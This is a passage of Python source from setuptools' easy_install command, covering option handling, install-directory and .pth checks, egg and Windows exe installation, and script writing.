("install-dir=", "d", "install package to DIR"),
("script-dir=", "s", "install scripts to DIR"),
("exclude-scripts", "x", "Don't install scripts"),
("always-copy", "a", "Copy all needed packages to install dir"),
("index-url=", "i", "base URL of Python Package Index"),
("find-links=", "f", "additional URL(s) to search for packages"),
("build-directory=", "b",
"download/extract/build in DIR; keep the results"),
('optimize=', 'O',
"also compile with optimization: -O1 for \"python -O\", "
"-O2 for \"python -OO\", and -O0 to disable [default: -O0]"),
('record=', None,
"filename in which to record list of installed files"),
('always-unzip', 'Z', "don't install as a zipfile, no matter what"),
('site-dirs=', 'S', "list of directories where .pth files work"),
('editable', 'e', "Install specified packages in editable form"),
('no-deps', 'N', "don't install dependencies"),
('allow-hosts=', 'H', "pattern(s) that hostnames must match"),
('local-snapshots-ok', 'l',
"allow building eggs from local checkouts"),
('version', None, "print version information and exit"),
('no-find-links', None,
"Don't load find-links defined in packages being installed")
]
boolean_options = [
'zip-ok', 'multi-version', 'exclude-scripts', 'upgrade', 'always-copy',
'editable',
'no-deps', 'local-snapshots-ok', 'version'
]
if site.ENABLE_USER_SITE:
help_msg = "install in user site-package '%s'" % site.USER_SITE
user_options.append(('user', None, help_msg))
boolean_options.append('user')
negative_opt = {'always-unzip': 'zip-ok'}
create_index = PackageIndex
def initialize_options(self):
if site.ENABLE_USER_SITE:
whereami = os.path.abspath(__file__)
self.user = whereami.startswith(site.USER_SITE)
else:
self.user = 0
self.zip_ok = self.local_snapshots_ok = None
self.install_dir = self.script_dir = self.exclude_scripts = None
self.index_url = None
self.find_links = None
self.build_directory = None
self.args = None
self.optimize = self.record = None
self.upgrade = self.always_copy = self.multi_version = None
self.editable = self.no_deps = self.allow_hosts = None
self.root = self.prefix = self.no_report = None
self.version = None
self.install_purelib = None # for pure module distributions
self.install_platlib = None # non-pure (dists w/ extensions)
self.install_headers = None # for C/C++ headers
self.install_lib = None # set to either purelib or platlib
self.install_scripts = None
self.install_data = None
self.install_base = None
self.install_platbase = None
if site.ENABLE_USER_SITE:
self.install_userbase = site.USER_BASE
self.install_usersite = site.USER_SITE
else:
self.install_userbase = None
self.install_usersite = None
self.no_find_links = None
# Options not specifiable via command line
self.package_index = None
self.pth_file = self.always_copy_from = None
self.site_dirs = None
self.installed_projects = {}
self.sitepy_installed = False
# Always read easy_install options, even if we are subclassed, or have
# an independent instance created. This ensures that defaults will
# always come from the standard configuration file(s)' "easy_install"
# section, even if this is a "develop" or "install" command, or some
# other embedding.
self._dry_run = None
self.verbose = self.distribution.verbose
self.distribution._set_command_options(
self, self.distribution.get_option_dict('easy_install')
)
def delete_blockers(self, blockers):
for filename in blockers:
if os.path.exists(filename) or os.path.islink(filename):
log.info("Deleting %s", filename)
if not self.dry_run:
if (os.path.isdir(filename) and
not os.path.islink(filename)):
rmtree(filename)
else:
os.unlink(filename)
def finalize_options(self):
if self.version:
print('setuptools %s' % get_distribution('setuptools').version)
sys.exit()
py_version = sys.version.split()[0]
prefix, exec_prefix = get_config_vars('prefix', 'exec_prefix')
self.config_vars = {
'dist_name': self.distribution.get_name(),
'dist_version': self.distribution.get_version(),
'dist_fullname': self.distribution.get_fullname(),
'py_version': py_version,
'py_version_short': py_version[0:3],
'py_version_nodot': py_version[0] + py_version[2],
'sys_prefix': prefix,
'prefix': prefix,
'sys_exec_prefix': exec_prefix,
'exec_prefix': exec_prefix,
# Only python 3.2+ has abiflags
'abiflags': getattr(sys, 'abiflags', ''),
}
if site.ENABLE_USER_SITE:
self.config_vars['userbase'] = self.install_userbase
self.config_vars['usersite'] = self.install_usersite
# fix the install_dir if "--user" was used
# XXX: duplicate of the code in the setup command
if self.user and site.ENABLE_USER_SITE:
self.create_home_path()
if self.install_userbase is None:
raise DistutilsPlatformError(
"User base directory is not specified")
self.install_base = self.install_platbase = self.install_userbase
if os.name == 'posix':
self.select_scheme("unix_user")
else:
self.select_scheme(os.name + "_user")
self.expand_basedirs()
self.expand_dirs()
self._expand('install_dir', 'script_dir', 'build_directory',
'site_dirs')
# If a non-default installation directory was specified, default the
# script directory to match it.
if self.script_dir is None:
self.script_dir = self.install_dir
if self.no_find_links is None:
self.no_find_links = False
# Let install_dir get set by install_lib command, which in turn
# gets its info from the install command, and takes into account
# --prefix and --home and all that other crud.
self.set_undefined_options(
'install_lib', ('install_dir', 'install_dir')
)
# Likewise, set default script_dir from 'install_scripts.install_dir'
self.set_undefined_options(
'install_scripts', ('install_dir', 'script_dir')
)
if self.user and self.install_purelib:
self.install_dir = self.install_purelib
self.script_dir = self.install_scripts
# default --record from the install command
self.set_undefined_options('install', ('record', 'record'))
# Should this be moved to the if statement below? It's not used
# elsewhere
normpath = map(normalize_path, sys.path)
self.all_site_dirs = get_site_dirs()
if self.site_dirs is not None:
site_dirs = [
os.path.expanduser(s.strip()) for s in
self.site_dirs.split(',')
]
for d in site_dirs:
if not os.path.isdir(d):
log.warn("%s (in --site-dirs) does not exist", d)
elif normalize_path(d) not in normpath:
raise DistutilsOptionError(
d + " (in --site-dirs) is not on sys.path"
)
else:
self.all_site_dirs.append(normalize_path(d))
if not self.editable:
self.check_site_dir()
self.index_url = self.index_url or "https://pypi.python.org/simple"
self.shadow_path = self.all_site_dirs[:]
for path_item in self.install_dir, normalize_path(self.script_dir):
if path_item not in self.shadow_path:
self.shadow_path.insert(0, path_item)
if self.allow_hosts is not None:
hosts = [s.strip() for s in self.allow_hosts.split(',')]
else:
hosts = ['*']
if self.package_index is None:
self.package_index = self.create_index(
self.index_url, search_path=self.shadow_path, hosts=hosts,
)
self.local_index = Environment(self.shadow_path + sys.path)
if self.find_links is not None:
if isinstance(self.find_links, basestring):
self.find_links = self.find_links.split()
else:
self.find_links = []
if self.local_snapshots_ok:
self.package_index.scan_egg_links(self.shadow_path + sys.path)
if not self.no_find_links:
self.package_index.add_find_links(self.find_links)
self.set_undefined_options('install_lib', ('optimize', 'optimize'))
if not isinstance(self.optimize, int):
try:
self.optimize = int(self.optimize)
if not (0 <= self.optimize <= 2):
raise ValueError
except ValueError:
raise DistutilsOptionError("--optimize must be 0, 1, or 2")
if self.editable and not self.build_directory:
raise DistutilsArgError(
"Must specify a build directory (-b) when using --editable"
)
if not self.args:
raise DistutilsArgError(
"No urls, filenames, or requirements specified (see --help)")
self.outputs = []
def _expand_attrs(self, attrs):
for attr in attrs:
val = getattr(self, attr)
if val is not None:
if os.name == 'posix' or os.name == 'nt':
val = os.path.expanduser(val)
val = subst_vars(val, self.config_vars)
setattr(self, attr, val)
def expand_basedirs(self):
"""Calls `os.path.expanduser` on install_base, install_platbase and
root."""
self._expand_attrs(['install_base', 'install_platbase', 'root'])
def expand_dirs(self):
"""Calls `os.path.expanduser` on install dirs."""
self._expand_attrs(['install_purelib', 'install_platlib',
'install_lib', 'install_headers',
'install_scripts', 'install_data', ])
def run(self):
if self.verbose != self.distribution.verbose:
log.set_verbosity(self.verbose)
try:
for spec in self.args:
self.easy_install(spec, not self.no_deps)
if self.record:
outputs = self.outputs
if self.root: # strip any package prefix
root_len = len(self.root)
for counter in range(len(outputs)):
outputs[counter] = outputs[counter][root_len:]
from distutils import file_util
self.execute(
file_util.write_file, (self.record, outputs),
"writing list of installed files to '%s'" %
self.record
)
self.warn_deprecated_options()
finally:
log.set_verbosity(self.distribution.verbose)
def pseudo_tempname(self):
"""Return a pseudo-tempname base in the install directory.
This code is intentionally naive; if a malicious party can write to
the target directory you're already in deep doodoo.
"""
try:
pid = os.getpid()
except:
pid = random.randint(0, maxsize)
return os.path.join(self.install_dir, "test-easy-install-%s" % pid)
def warn_deprecated_options(self):
pass
def check_site_dir(self):
"""Verify that self.install_dir is .pth-capable dir, if needed"""
instdir = normalize_path(self.install_dir)
pth_file = os.path.join(instdir, 'easy-install.pth')
# Is it a configured, PYTHONPATH, implicit, or explicit site dir?
is_site_dir = instdir in self.all_site_dirs
if not is_site_dir and not self.multi_version:
# No? Then directly test whether it does .pth file processing
is_site_dir = self.check_pth_processing()
else:
# make sure we can write to target dir
testfile = self.pseudo_tempname() + '.write-test'
test_exists = os.path.exists(testfile)
try:
if test_exists:
os.unlink(testfile)
open(testfile, 'w').close()
os.unlink(testfile)
except (OSError, IOError):
self.cant_write_to_target()
if not is_site_dir and not self.multi_version:
# Can't install non-multi to non-site dir
raise DistutilsError(self.no_default_version_msg())
if is_site_dir:
if self.pth_file is None:
self.pth_file = PthDistributions(pth_file, self.all_site_dirs)
else:
self.pth_file = None
PYTHONPATH = os.environ.get('PYTHONPATH', '').split(os.pathsep)
if instdir not in map(normalize_path, [_f for _f in PYTHONPATH if _f]):
# only PYTHONPATH dirs need a site.py, so pretend it's there
self.sitepy_installed = True
elif self.multi_version and not os.path.exists(pth_file):
self.sitepy_installed = True # don't need site.py in this case
self.pth_file = None # and don't create a .pth file
self.install_dir = instdir
def cant_write_to_target(self):
template = """can't create or remove files in install directory
The following error occurred while trying to add or remove files in the
installation directory:
%s
The installation directory you specified (via --install-dir, --prefix, or
the distutils default setting) was:
%s
"""
msg = template % (sys.exc_info()[1], self.install_dir,)
if not os.path.exists(self.install_dir):
msg += """
This directory does not currently exist. Please create it and try again, or
choose a different installation directory (using the -d or --install-dir
option).
"""
else:
msg += """
Perhaps your account does not have write access to this directory? If the
installation directory is a system-owned directory, you may need to sign in
as the administrator or "root" account. If you do not have administrative
access to this machine, you may wish to choose a different installation
directory, preferably one that is listed in your PYTHONPATH environment
variable.
For information on other options, you may wish to consult the
documentation at:
https://pythonhosted.org/setuptools/easy_install.html
Please make the appropriate changes for your system and try again.
"""
raise DistutilsError(msg)
def check_pth_processing(self):
"""Empirically verify whether .pth files are supported in inst. dir"""
instdir = self.install_dir
log.info("Checking .pth file support in %s", instdir)
pth_file = self.pseudo_tempname() + ".pth"
ok_file = pth_file + '.ok'
ok_exists = os.path.exists(ok_file)
try:
if ok_exists:
os.unlink(ok_file)
dirname = os.path.dirname(ok_file)
if not os.path.exists(dirname):
os.makedirs(dirname)
f = open(pth_file, 'w')
except (OSError, IOError):
self.cant_write_to_target()
else:
try:
f.write("import os; f = open(%r, 'w'); f.write('OK'); "
"f.close()\n" % (ok_file,))
f.close()
f = None
executable = sys.executable
if os.name == 'nt':
dirname, basename = os.path.split(executable)
alt = os.path.join(dirname, 'pythonw.exe')
if (basename.lower() == 'python.exe' and
os.path.exists(alt)):
# use pythonw.exe to avoid opening a console window
executable = alt
from distutils.spawn import spawn
spawn([executable, '-E', '-c', 'pass'], 0)
if os.path.exists(ok_file):
log.info(
"TEST PASSED: %s appears to support .pth files",
instdir
)
return True
finally:
if f:
f.close()
if os.path.exists(ok_file):
os.unlink(ok_file)
if os.path.exists(pth_file):
os.unlink(pth_file)
if not self.multi_version:
log.warn("TEST FAILED: %s does NOT support .pth files", instdir)
return False
def install_egg_scripts(self, dist):
"""Write all the scripts for `dist`, unless scripts are excluded"""
if not self.exclude_scripts and dist.metadata_isdir('scripts'):
for script_name in dist.metadata_listdir('scripts'):
if dist.metadata_isdir('scripts/' + script_name):
# The "script" is a directory, likely a Python 3
# __pycache__ directory, so skip it.
continue
self.install_script(
dist, script_name,
dist.get_metadata('scripts/' + script_name)
)
self.install_wrapper_scripts(dist)
def add_output(self, path):
if os.path.isdir(path):
for base, dirs, files in os.walk(path):
for filename in files:
self.outputs.append(os.path.join(base, filename))
else:
self.outputs.append(path)
def not_editable(self, spec):
if self.editable:
raise DistutilsArgError(
"Invalid argument %r: you can't use filenames or URLs "
"with --editable (except via the --find-links option)."
% (spec,)
)
def check_editable(self, spec):
if not self.editable:
return
if os.path.exists(os.path.join(self.build_directory, spec.key)):
raise DistutilsArgError(
"%r already exists in %s; can't do a checkout there" %
(spec.key, self.build_directory)
)
def easy_install(self, spec, deps=False):
tmpdir = tempfile.mkdtemp(prefix="easy_install-")
download = None
if not self.editable:
self.install_site_py()
try:
if not isinstance(spec, Requirement):
if URL_SCHEME(spec):
# It's a url, download it to tmpdir and process
self.not_editable(spec)
download = self.package_index.download(spec, tmpdir)
return self.install_item(None, download, tmpdir, deps,
True)
elif os.path.exists(spec):
# Existing file or directory, just process it directly
self.not_editable(spec)
return self.install_item(None, spec, tmpdir, deps, True)
else:
spec = parse_requirement_arg(spec)
self.check_editable(spec)
dist = self.package_index.fetch_distribution(
spec, tmpdir, self.upgrade, self.editable,
not self.always_copy, self.local_index
)
if dist is None:
msg = "Could not find suitable distribution for %r" % spec
if self.always_copy:
msg += " (--always-copy skips system and development eggs)"
raise DistutilsError(msg)
elif dist.precedence == DEVELOP_DIST:
# .egg-info dists don't need installing, just process deps
self.process_distribution(spec, dist, deps, "Using")
return dist
else:
return self.install_item(spec, dist.location, tmpdir, deps)
finally:
if os.path.exists(tmpdir):
rmtree(tmpdir)
def install_item(self, spec, download, tmpdir, deps, install_needed=False):
# Installation is also needed if file in tmpdir or is not an egg
install_needed = install_needed or self.always_copy
install_needed = install_needed or os.path.dirname(download) == tmpdir
install_needed = install_needed or not download.endswith('.egg')
install_needed = install_needed or (
self.always_copy_from is not None and
os.path.dirname(normalize_path(download)) ==
normalize_path(self.always_copy_from)
)
if spec and not install_needed:
# at this point, we know it's a local .egg, we just don't know if
# it's already installed.
for dist in self.local_index[spec.project_name]:
if dist.location == download:
break
else:
install_needed = True # it's not in the local index
log.info("Processing %s", os.path.basename(download))
if install_needed:
dists = self.install_eggs(spec, download, tmpdir)
for dist in dists:
self.process_distribution(spec, dist, deps)
else:
dists = [self.egg_distribution(download)]
self.process_distribution(spec, dists[0], deps, "Using")
if spec is not None:
for dist in dists:
if dist in spec:
return dist
def select_scheme(self, name):
"""Sets the install directories by applying the install schemes."""
# it's the caller's problem if they supply a bad name!
scheme = INSTALL_SCHEMES[name]
for key in SCHEME_KEYS:
attrname = 'install_' + key
if getattr(self, attrname) is None:
setattr(self, attrname, scheme[key])
def process_distribution(self, requirement, dist, deps=True, *info):
self.update_pth(dist)
self.package_index.add(dist)
if dist in self.local_index[dist.key]:
self.local_index.remove(dist)
self.local_index.add(dist)
self.install_egg_scripts(dist)
self.installed_projects[dist.key] = dist
log.info(self.installation_report(requirement, dist, *info))
if (dist.has_metadata('dependency_links.txt') and
not self.no_find_links):
self.package_index.add_find_links(
dist.get_metadata_lines('dependency_links.txt')
)
if not deps and not self.always_copy:
return
elif requirement is not None and dist.key != requirement.key:
log.warn("Skipping dependencies for %s", dist)
return # XXX this is not the distribution we were looking for
elif requirement is None or dist not in requirement:
# if we wound up with a different version, resolve what we've got
distreq = dist.as_requirement()
requirement = requirement or distreq
requirement = Requirement(
distreq.project_name, distreq.specs, requirement.extras
)
log.info("Processing dependencies for %s", requirement)
try:
distros = WorkingSet([]).resolve(
[requirement], self.local_index, self.easy_install
)
except DistributionNotFound as e:
raise DistutilsError(
"Could not find required distribution %s" % e.args
)
except VersionConflict as e:
raise DistutilsError(e.report())
if self.always_copy or self.always_copy_from:
# Force all the relevant distros to be copied or activated
for dist in distros:
if dist.key not in self.installed_projects:
self.easy_install(dist.as_requirement())
log.info("Finished processing dependencies for %s", requirement)
def should_unzip(self, dist):
if self.zip_ok is not None:
return not self.zip_ok
if dist.has_metadata('not-zip-safe'):
return True
if not dist.has_metadata('zip-safe'):
return True
return False
def maybe_move(self, spec, dist_filename, setup_base):
dst = os.path.join(self.build_directory, spec.key)
if os.path.exists(dst):
msg = ("%r already exists in %s; build directory %s will not be "
"kept")
log.warn(msg, spec.key, self.build_directory, setup_base)
return setup_base
if os.path.isdir(dist_filename):
setup_base = dist_filename
else:
if os.path.dirname(dist_filename) == setup_base:
os.unlink(dist_filename) # get it out of the tmp dir
contents = os.listdir(setup_base)
if len(contents) == 1:
dist_filename = os.path.join(setup_base, contents[0])
if os.path.isdir(dist_filename):
# if the only thing there is a directory, move it instead
setup_base = dist_filename
ensure_directory(dst)
shutil.move(setup_base, dst)
return dst
def install_wrapper_scripts(self, dist):
if not self.exclude_scripts:
for args in ScriptWriter.best().get_args(dist):
self.write_script(*args)
def install_script(self, dist, script_name, script_text, dev_path=None):
"""Generate a legacy script wrapper and install it"""
spec = str(dist.as_requirement())
is_script = is_python_script(script_text, script_name)
if is_script:
script_text = (ScriptWriter.get_header(script_text) +
self._load_template(dev_path) % locals())
self.write_script(script_name, _to_ascii(script_text), 'b')
@staticmethod
def _load_template(dev_path):
"""
There are a couple of template scripts in the package. This
function loads one of them and prepares it for use.
"""
# See https://bitbucket.org/pypa/setuptools/issue/134 for info
# on script file naming and downstream issues with SVR4
name = 'script.tmpl'
if dev_path:
name = name.replace('.tmpl', ' (dev).tmpl')
raw_bytes = resource_string('setuptools', name)
return raw_bytes.decode('utf-8')
def write_script(self, script_name, contents, mode="t", blockers=()):
"""Write an executable file to the scripts directory"""
self.delete_blockers( # clean up old .py/.pyw w/o a script
[os.path.join(self.script_dir, x) for x in blockers]
)
log.info("Installing %s script to %s", script_name, self.script_dir)
target = os.path.join(self.script_dir, script_name)
self.add_output(target)
mask = current_umask()
if not self.dry_run:
ensure_directory(target)
if os.path.exists(target):
os.unlink(target)
f = open(target, "w" + mode)
f.write(contents)
f.close()
chmod(target, 0o777 - mask)
def install_eggs(self, spec, dist_filename, tmpdir):
# .egg dirs or files are already built, so just return them
if dist_filename.lower().endswith('.egg'):
return [self.install_egg(dist_filename, tmpdir)]
elif dist_filename.lower().endswith('.exe'):
return [self.install_exe(dist_filename, tmpdir)]
# Anything else, try to extract and build
setup_base = tmpdir
if os.path.isfile(dist_filename) and not dist_filename.endswith('.py'):
unpack_archive(dist_filename, tmpdir, self.unpack_progress)
elif os.path.isdir(dist_filename):
setup_base = os.path.abspath(dist_filename)
if (setup_base.startswith(tmpdir) # something we downloaded
and self.build_directory and spec is not None):
setup_base = self.maybe_move(spec, dist_filename, setup_base)
# Find the setup.py file
setup_script = os.path.join(setup_base, 'setup.py')
if not os.path.exists(setup_script):
setups = glob(os.path.join(setup_base, '*', 'setup.py'))
if not setups:
raise DistutilsError(
"Couldn't find a setup script in %s" %
os.path.abspath(dist_filename)
)
if len(setups) > 1:
raise DistutilsError(
"Multiple setup scripts in %s" %
os.path.abspath(dist_filename)
)
setup_script = setups[0]
# Now run it, and return the result
if self.editable:
log.info(self.report_editable(spec, setup_script))
return []
else:
return self.build_and_install(setup_script, setup_base)
def egg_distribution(self, egg_path):
if os.path.isdir(egg_path):
metadata = PathMetadata(egg_path, os.path.join(egg_path,
'EGG-INFO'))
else:
metadata = EggMetadata(zipimport.zipimporter(egg_path))
return Distribution.from_filename(egg_path, metadata=metadata)
def install_egg(self, egg_path, tmpdir):
destination = os.path.join(self.install_dir,
os.path.basename(egg_path))
destination = os.path.abspath(destination)
if not self.dry_run:
ensure_directory(destination)
dist = self.egg_distribution(egg_path)
if not samefile(egg_path, destination):
if os.path.isdir(destination) and not os.path.islink(destination):
dir_util.remove_tree(destination, dry_run=self.dry_run)
elif os.path.exists(destination):
self.execute(os.unlink, (destination,), "Removing " +
destination)
try:
new_dist_is_zipped = False
if os.path.isdir(egg_path):
if egg_path.startswith(tmpdir):
f, m = shutil.move, "Moving"
else:
f, m = shutil.copytree, "Copying"
elif self.should_unzip(dist):
self.mkpath(destination)
f, m = self.unpack_and_compile, "Extracting"
else:
new_dist_is_zipped = True
if egg_path.startswith(tmpdir):
f, m = shutil.move, "Moving"
else:
f, m = shutil.copy2, "Copying"
self.execute(f, (egg_path, destination),
(m + " %s to %s") %
(os.path.basename(egg_path),
os.path.dirname(destination)))
update_dist_caches(destination,
fix_zipimporter_caches=new_dist_is_zipped)
except:
update_dist_caches(destination, fix_zipimporter_caches=False)
raise
self.add_output(destination)
return self.egg_distribution(destination)
def install_exe(self, dist_filename, tmpdir):
# See if it's valid, get data
cfg = extract_wininst_cfg(dist_filename)
if cfg is None:
raise DistutilsError(
"%s is not a valid distutils Windows .exe" % dist_filename
)
# Create a dummy distribution object until we build the real distro
dist = Distribution(
None,
project_name=cfg.get('metadata', 'name'),
version=cfg.get('metadata', 'version'), platform=get_platform(),
)
# Convert the .exe to an unpacked egg
egg_path = dist.location = os.path.join(tmpdir, dist.egg_name() +
'.egg')
egg_tmp = egg_path + '.tmp'
_egg_info = os.path.join(egg_tmp, 'EGG-INFO')
pkg_inf = os.path.join(_egg_info, 'PKG-INFO')
ensure_directory(pkg_inf) # make sure EGG-INFO dir exists
dist._provider = PathMetadata(egg_tmp, _egg_info) # XXX
self.exe_to_egg(dist_filename, egg_tmp)
# Write EGG-INFO/PKG-INFO
if not os.path.exists(pkg_inf):
f = open(pkg_inf, 'w')
f.write('Metadata-Version: 1.0\n')
for k, v in cfg.items('metadata'):
if k != 'target_version':
f.write('%s: %s\n' % (k.replace('_', '-').title(), v))
f.close()
script_dir = os.path.join(_egg_info, 'scripts')
# delete entry-point scripts to avoid duping
self.delete_blockers(
[os.path.join(script_dir, args[0]) for args in
ScriptWriter.get_args(dist)]
)
# Build .egg file from tmpdir
bdist_egg.make_zipfile(
egg_path, egg_tmp, verbose=self.verbose, dry_run=self.dry_run
)
# install the .egg
return self.install_egg(egg_path, tmpdir)
def exe_to_egg(self, dist_filename, egg_tmp):
"""Extract a bdist_wininst to the directories an egg would use"""
# Check for .pth file and set up prefix translations
prefixes = get_exe_prefixes(dist_filename)
to_compile = []
native_libs = []
top_level = {}
def process(src, dst):
s = src.lower()
for old, new in prefixes:
if s.startswith(old):
src = new + src[len(old):]
parts = src.split('/')
dst = os.path.join(egg_tmp, *parts)
dl = dst.lower()
if dl.endswith('.pyd') or dl.endswith('.dll'):
parts[-1] = bdist_egg.strip_module(parts[-1])
top_level[os.path.splitext(parts[0])[0]] = 1
native_libs.append(src)
elif dl.endswith('.py') and old != 'SCRIPTS/':
top_level[os.path.splitext(parts[0])[0]] = 1
to_compile.append(dst)
return dst
if not src.endswith('.pth'):
log.warn("WARNING: can't process %s", src)
return None
# extract, tracking .pyd/.dll->native_libs and .py -> to_compile
unpack_archive(dist_filename, egg_tmp, process)
stubs = []
for res in native_libs:
if res.lower().endswith('.pyd'): # create stubs for .pyd's
parts = res.split('/')
resource = parts[-1]
parts[-1] = bdist_egg.strip_module(parts[-1]) + '.py'
pyfile = os.path.join(egg_tmp, *parts)
to_compile.append(pyfile)
stubs.append(pyfile)
bdist_egg.write_stub(resource, pyfile)
self.byte_compile(to_compile) # compile .py's
bdist_egg.write_safety_flag(
os.path.join(egg_tmp, 'EGG-INFO'),
bdist_egg.analyze_egg(egg_tmp, stubs)) # write zip-safety flag
for name in 'top_level', 'native_libs':
if locals()[name]:
txt = os.path.join(egg_tmp, 'EGG-INFO', name + '.txt')
if not os.path.exists(txt):
f = open(txt, 'w')
f.write('\n'.join(locals()[name]) + '\n')
f.close()
def installation_report(self, req, dist, what="Installed"):
"""Helpful installation message for display to package users"""
msg = "\n%(what)s %(eggloc)s%(extras)s"
if self.multi_version and not self.no_report:
msg += """
Because this distribution was installed --multi-version, before you can
import modules from this package in an application, you will need to
'import pkg_resources' and then use a 'require()' call similar to one of
these examples, in order to select the desired version:
pkg_resources.require("%(name)s") # latest installed version
pkg_resources.require("%(name)s==%(version)s") # this exact version
pkg_resources.require("%(name)s>=%(version)s") # this version or higher
"""
if self.install_dir not in map(normalize_path, sys.path):
msg += """
Note also that the installation directory must be on sys.path at runtime for
this to work. (e.g. by being the application's script directory, by being on
PYTHONPATH, or by being added to sys.path by your code.)
"""
eggloc = dist.location
name = dist.project_name
version = dist.version
extras = '' # TODO: self.report_extras(req, dist)
return msg % locals()
def report_editable(self, spec, setup_script):
dirname = os.path.dirname(setup_script)
python = sys.executable
return """\nExtracted editable version of %(spec)s to %(dirname)s
If it uses setuptools in its setup script, you can activate it in
"development" mode by going to that directory and running::
%(python)s setup.py develop
See the setuptools documentation for the "develop" command for more info.
""" % locals()
def run_setup(self, setup_script, setup_base, args):
sys.modules.setdefault('distutils.command.bdist_egg', bdist_egg)
sys.modules.setdefault('distutils.command.egg_info', egg_info)
args = list(args)
if self.verbose > 2:
v = 'v' * (self.verbose - 1)
args.insert(0, '-' + v)
elif self.verbose < 2:
args.insert(0, '-q')
if self.dry_run:
args.insert(0, '-n')
log.info(
"Running %s %s", setup_script[len(setup_base) + 1:], ' '.join(args)
)
try:
run_setup(setup_script, args)
except SystemExit as v:
raise DistutilsError("Setup script exited with %s" % (v.args[0],))
def build_and_install(self, setup_script, setup_base):
args = ['bdist_egg', '--dist-dir']
dist_dir = tempfile.mkdtemp(
prefix='egg-dist-tmp-', dir=os.path.dirname(setup_script)
)
try:
self._set_fetcher_options(os.path.dirname(setup_script))
args.append(dist_dir)
self.run_setup(setup_script, setup_base, args)
all_eggs = Environment([dist_dir])
eggs = []
for key in all_eggs:
for dist in all_eggs[key]:
eggs.append(self.install_egg(dist.location, setup_base))
if not eggs and not self.dry_run:
log.warn("No eggs found in %s (setup script problem?)",
dist_dir)
return eggs
finally:
rmtree(dist_dir)
log.set_verbosity(self.verbose) # restore our log verbosity
def _set_fetcher_options(self, base):
"""
When easy_install is about to run bdist_egg on a source dist, that
source dist might have 'setup_requires' directives, requiring
additional fetching. Ensure the fetcher options given to easy_install
are available to that command as well.
"""
# find the fetch options from easy_install and write them out
# to the setup.cfg file.
ei_opts = self.distribution.get_option_dict('easy_install').copy()
fetch_directives = (
'find_links', 'site_dirs', 'index_url', 'optimize',
'site_dirs', 'allow_hosts',
)
fetch_options = {}
for key, val in ei_opts.items():
if key not in fetch_directives:
continue
fetch_options[key.replace('_', '-')] = val[1]
# create a settings dictionary suitable for `edit_config`
settings = dict(easy_install=fetch_options)
cfg_filename = os.path.join(base, 'setup.cfg')
setopt.edit_config(cfg_filename, settings)
def update_pth(self, dist):
if self.pth_file is None:
return
for d in self.pth_file[dist.key]: # drop old entries
if self.multi_version or d.location != dist.location:
log.info("Removing %s from easy-install.pth file", d)
self.pth_file.remove(d)
if d.location in self.shadow_path:
self.shadow_path.remove(d.location)
if not self.multi_version:
if dist.location in self.pth_file.paths:
log.info(
"%s is already the active version in easy-install.pth",
dist
)
else:
log.info("Adding %s to easy-install.pth file", dist)
self.pth_file.add(dist) # add new entry
if dist.location not in self.shadow_path:
self.shadow_path.append(dist.location)
if not self.dry_run:
self.pth_file.save()
if dist.key == 'setuptools':
# Ensure that setuptools itself never becomes unavailable!
# XXX should this check for latest version?
filename = os.path.join(self.install_dir, 'setuptools.pth')
if os.path.islink(filename):
os.unlink(filename)
f = open(filename, 'wt')
f.write(self.pth_file.make_relative(dist.location) + '\n')
f.close()
def unpack_progress(self, src, dst):
# Progress filter for unpacking
log.debug("Unpacking %s to %s", src, dst)
return dst # only unpack-and-compile skips files for dry run
def unpack_and_compile(self, egg_path, destination):
to_compile = []
to_chmod = []
def pf(src, dst):
if dst.endswith('.py') and not src.startswith('EGG-INFO/'):
to_compile.append(dst)
elif dst.endswith('.dll') or dst.endswith('.so'):
to_chmod.append(dst)
self.unpack_progress(src, dst)
return not self.dry_run and dst or None
unpack_archive(egg_path, destination, pf)
self.byte_compile(to_compile)
if not self.dry_run:
for f in to_chmod:
mode = ((os.stat(f)[stat.ST_MODE]) | 0o555) & 0o7755
chmod(f, mode)
def byte_compile(self, to_compile):
if sys.dont_write_bytecode:
self.warn('byte-compiling is disabled, skipping.')
return
from distutils.util import byte_compile
try:
# try to make the byte compile messages quieter
log.set_verbosity(self.verbose - 1)
byte_compile(to_compile, optimize=0, force=1, dry_run=self.dry_run)
if self.optimize:
byte_compile(
to_compile, optimize=self.optimize, force=1,
dry_run=self.dry_run
)
finally:
log.set_verbosity(self.verbose) # restore original verbosity
def no_default_version_msg(self):
template = """bad install directory or PYTHONPATH
You are attempting to install a package to a directory that is not
on PYTHONPATH and which Python does not read ".pth" files from. The
installation directory you specified (via --install-dir, --prefix, or
the distutils default setting) was:
%s
and your PYTHONPATH environment variable currently contains:
%r
Here are some of your options for correcting the problem:
* You can choose a different installation directory, i.e., one that is
on PYTHONPATH or supports .pth files
* You can add the installation directory to the PYTHONPATH environment
variable. (It must then also be on PYTHONPATH whenever you run
Python and want to use the package(s) you are installing.)
* You can set up the installation directory to support ".pth" files by
using one of the approaches described here:
https://pythonhosted.org/setuptools/easy_install.html#custom-installation-locations
Please make the appropriate changes for your system and try again."""
return template % (self.install_dir, os.environ.get('PYTHONPATH', ''))
def install_site_py(self):
"""Make sure there's a site.py in the target dir, if needed"""
if self.sitepy_installed:
return # already did it, or don't need to
sitepy = os.path.join(self.install_dir, "site.py")
source = resource_string("setuptools", "site-patch.py")
current = ""
if os.path.exists(sitepy):
log.debug("Checking existing site.py in %s", self.install_dir)
f = open(sitepy, 'rb')
current = f.read()
# we want str, not bytes
if PY3:
current = current.decode()
f.close()
if not current.startswith('def __boot():'):
raise DistutilsError(
"%s is not a setuptools-generated site.py; please"
" remove it." % sitepy
)
if current != source:
log.info("Creating %s", sitepy)
if not self.dry_run:
ensure_directory(sitepy)
f = open(sitepy, 'wb')
f.write(source)
f.close()
self.byte_compile([sitepy])
self.sitepy_installed = True
def create_home_path(self):
"""Create directories under ~."""
if not self.user:
return
home = convert_path(os.path.expanduser("~"))
for name, path in iteritems(self.config_vars):
if path.startswith(home) and not os.path.isdir(path):
self.debug_print("os.makedirs('%s', 0o700)" % path)
os.makedirs(path, 0o700)
INSTALL_SCHEMES = dict(
posix=dict(
install_dir='$base/lib/python$py_version_short/site-packages',
script_dir='$base/bin',
),
)
DEFAULT_SCHEME = dict(
install_dir='$base/Lib/site-packages',
script_dir='$base/Scripts',
)
def _expand(self, *attrs):
config_vars = self.get_finalized_command('install').config_vars
if self.prefix:
# Set default install_dir/scripts from --prefix
config_vars = config_vars.copy()
config_vars['base'] = self.prefix
scheme = self.INSTALL_SCHEMES.get(os.name, self.DEFAULT_SCHEME)
for attr, val in scheme.items():
if getattr(self, attr, None) is None:
setattr(self, attr, val)
